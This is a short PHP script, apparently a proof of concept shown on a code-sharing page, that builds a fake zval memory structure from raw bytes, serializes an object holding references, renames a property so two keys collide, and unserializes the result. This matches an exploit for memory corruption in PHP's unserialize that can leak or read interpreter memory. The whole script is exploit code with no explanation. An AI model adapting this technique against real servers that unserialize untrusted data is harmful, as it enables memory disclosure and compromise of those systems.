- var_dump: documentation ( source)
- chr: documentation ( source)
- unserialize: documentation ( source)
- serialize: documentation ( source)
- str_replace: documentation ( source)
<?php
$base = 0xb788;
function ptr2str($ptr)
{
$out = "";
for ($i=0; $i<8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
$zval = ptr2str($base);// zvalue_value value; /* value */
$zval .= ptr2str(0xf);
$zval .= "\x00\x00\x00\x00";// zend_uint refcount__gc;
//$zval .= ptr2str(0);
$zval .= "\x06";// zend_uchar type; /* active type */
//$zval .= ptr2str(0x6);
$zval .= "\x00";// zend_uchar is_ref__gc;
$zval .= ptr2str(0);
$zval .= ptr2str(0);
$zval .= ptr2str(0);
$zval .= 'AA';
$m = new StdClass();
$u = 'AAAA';
$m->aaa = array(1,2,&$u,4,5);
$m->bbb = 1;
$m->ddd = array(1,2,$zval);
$m->ccc = &$u;
$z = serialize($m);
$z = str_replace("bbb", "aaa", $z);
var_dump($z);
$y = unserialize($z);
var_dump($y);